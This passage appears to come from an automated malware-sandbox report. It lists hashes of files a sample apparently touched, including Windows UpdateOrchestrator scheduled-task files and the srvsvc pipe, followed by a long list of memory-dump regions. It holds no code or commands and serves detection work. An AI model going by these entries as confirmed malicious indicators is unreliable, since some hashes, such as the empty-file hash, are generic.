  MD5: ceb7caa4e9c4b8d760dbf7e9e5ca44c5
  SHA1: a3879621f9493414d497ea6d70fbf17e283d5c08
  SHA256: 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
  SHA512: 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
- C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
  Filesize: 2KB
  MD5: 7d612892b20e70250dbd00d0cdd4f09b
  SHA1: 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
  SHA256: 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
  SHA512: f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
- C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
  Filesize: 2KB
  MD5: 1e8e2076314d54dd72e7ee09ff8a52ab
  SHA1: 5fd0a67671430f66237f483eef39ff599b892272
  SHA256: 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
  SHA512: 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
- C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
  Filesize: 2KB
  MD5: 0b990e24f1e839462c0ac35fef1d119e
  SHA1: 9e17905f8f68f9ce0a2024d57b537aa8b39c6708
  SHA256: a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
  SHA512: c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
- \??\PIPE\srvsvc
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
- memory/316-171-0x000001EC4B440000-0x000001EC4B46B000-memory.dmp
  Filesize: 172KB
- memory/316-172-0x00007FF9380D0000-0x00007FF9380E0000-memory.dmp
  Filesize: 64KB
- memory/316-165-0x000001EC4B440000-0x000001EC4B46B000-memory.dmp
  Filesize: 172KB
- memory/388-176-0x0000022E61060000-0x0000022E6108B000-memory.dmp
  Filesize: 172KB
- memory/548-102-0x0000000007330000-0x00000000073A6000-memory.dmp
  Filesize: 472KB
- memory/548-97-0x0000000007140000-0x0000000007184000-memory.dmp
  Filesize: 272KB
- memory/608-138-0x00000220B0110000-0x00000220B013B000-memory.dmp
  Filesize: 172KB
- memory/608-131-0x00000220B0110000-0x00000220B013B000-memory.dmp
  Filesize: 172KB
- memory/608-130-0x00000220B00E0000-0x00000220B0105000-memory.dmp
  Filesize: 148KB
- memory/608-139-0x00007FF9380D0000-0x00007FF9380E0000-memory.dmp
  Filesize: 64KB
- memory/608-132-0x00000220B0110000-0x00000220B013B000-memory.dmp
  Filesize: 172KB
- memory/664-150-0x00007FF9380D0000-0x00007FF9380E0000-memory.dmp
  Filesize: 64KB
- memory/664-149-0x0000026203F40000-0x0000026203F6B000-memory.dmp
  Filesize: 172KB
- memory/664-143-0x0000026203F40000-0x0000026203F6B000-memory.dmp
  Filesize: 172KB
- memory/948-161-0x00007FF9380D0000-0x00007FF9380E0000-memory.dmp
  Filesize: 64KB
- memory/948-154-0x0000028FD3800000-0x0000028FD382B000-memory.dmp
  Filesize: 172KB
- memory/948-160-0x0000028FD3800000-0x0000028FD382B000-memory.dmp
  Filesize: 172KB
- memory/2028-116-0x00007FF977DA0000-0x00007FF977E5E000-memory.dmp
  Filesize: 760KB
- memory/2028-115-0x00007FF978050000-0x00007FF978245000-memory.dmp
  Filesize: 2.0MB
- memory/2028-104-0x00000204D5400000-0x00000204D5422000-memory.dmp
  Filesize: 136KB
- memory/2028-114-0x00000204D5550000-0x00000204D557A000-memory.dmp
  Filesize: 168KB
- memory/2572-19-0x00000000060A0000-0x00000000060EC000-memory.dmp
  Filesize: 304KB
- memory/2572-5-0x00000000051A0000-0x00000000051C2000-memory.dmp
  Filesize: 136KB
- memory/2572-21-0x00000000071E0000-0x00000000071FA000-memory.dmp
  Filesize: 104KB
- memory/2572-81-0x00000000744B0000-0x0000000074C60000-memory.dmp
  Filesize: 7.7MB
- memory/2572-22-0x0000000002A80000-0x0000000002A88000-memory.dmp
  Filesize: 32KB
- memory/2572-18-0x0000000006050000-0x000000000606E000-memory.dmp
  Filesize: 120KB
- memory/2572-17-0x0000000005C90000-0x0000000005FE4000-memory.dmp
  Filesize: 3.3MB
- memory/2572-7-0x0000000005B10000-0x0000000005B76000-memory.dmp
  Filesize: 408KB
- memory/2572-6-0x00000000059F0000-0x0000000005A56000-memory.dmp
  Filesize: 408KB
- memory/2572-20-0x0000000007820000-0x0000000007E9A000-memory.dmp
  Filesize: 6.5MB
- memory/2572-23-0x0000000007270000-0x00000000072D2000-memory.dmp
  Filesize: 392KB
- memory/2572-24-0x0000000009450000-0x00000000099F4000-memory.dmp
  Filesize: 5.6MB
- memory/2572-0-0x00000000744BE000-0x00000000744BF000-memory.dmp
  Filesize: 4KB
- memory/2572-4-0x00000000744B0000-0x0000000074C60000-memory.dmp
  Filesize: 7.7MB
- memory/2572-3-0x00000000744B0000-0x0000000074C60000-memory.dmp
  Filesize: 7.7MB
- memory/2572-2-0x0000000005350000-0x0000000005978000-memory.dmp
  Filesize: 6.2MB
- memory/2572-1-0x0000000004B80000-0x0000000004BB6000-memory.dmp
  Filesize: 216KB
- memory/3384-37-0x00000000744B0000-0x0000000074C60000-memory.dmp
  Filesize: 7.7MB
- memory/3384-50-0x0000000006CE0000-0x0000000006CFE000-memory.dmp
  Filesize: 120KB
- memory/3384-26-0x00000000744B0000-0x0000000074C60000-memory.dmp
  Filesize: 7.7MB
- memory/3384-36-0x00000000744B0000-0x0000000074C60000-memory.dmp
  Filesize: 7.7MB
- memory/3384-38-0x0000000006D00000-0x0000000006D32000-memory.dmp
  Filesize: 200KB
- memory/3384-51-0x0000000006D50000-0x0000000006DF3000-memory.dmp
  Filesize: 652KB
- memory/3384-52-0x00000000744B0000-0x0000000074C60000-memory.dmp
  Filesize: 7.7MB
- memory/3384-49-0x00000000744B0000-0x0000000074C60000-memory.dmp
  Filesize: 7.7MB
- memory/3384-39-0x00000000702D0000-0x000000007031C000-memory.dmp
  Filesize: 304KB
- memory/3384-53-0x0000000006F10000-0x0000000006F1A000-memory.dmp
  Filesize: 40KB
- memory/3384-59-0x00000000744B0000-0x0000000074C60000-memory.dmp
  Filesize: 7.7MB
- memory/3384-56-0x00000000744B0000-0x0000000074C60000-memory.dmp
  Filesize: 7.7MB
- memory/3384-55-0x00000000070B0000-0x00000000070C1000-memory.dmp
  Filesize: 68KB
- memory/3384-54-0x0000000007140000-0x00000000071D6000-memory.dmp
  Filesize: 600KB
- memory/3964-79-0x0000000006E80000-0x0000000006EEC000-memory.dmp
  Filesize: 432KB
- memory/3964-80-0x0000000006FB0000-0x0000000007042000-memory.dmp
  Filesize: 584KB
- memory/3964-82-0x0000000004930000-0x0000000004942000-memory.dmp
  Filesize: 72KB
- memory/3964-83-0x0000000007250000-0x000000000728C000-memory.dmp
  Filesize: 240KB
- memory/3984-119-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB
- memory/3984-117-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB
- memory/3984-118-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB
- memory/3984-120-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB
- memory/3984-126-0x00007FF977DA0000-0x00007FF977E5E000-memory.dmp
  Filesize: 760KB
- memory/3984-125-0x00007FF978050000-0x00007FF978245000-memory.dmp
  Filesize: 2.0MB
- memory/3984-122-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB
- memory/3984-127-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB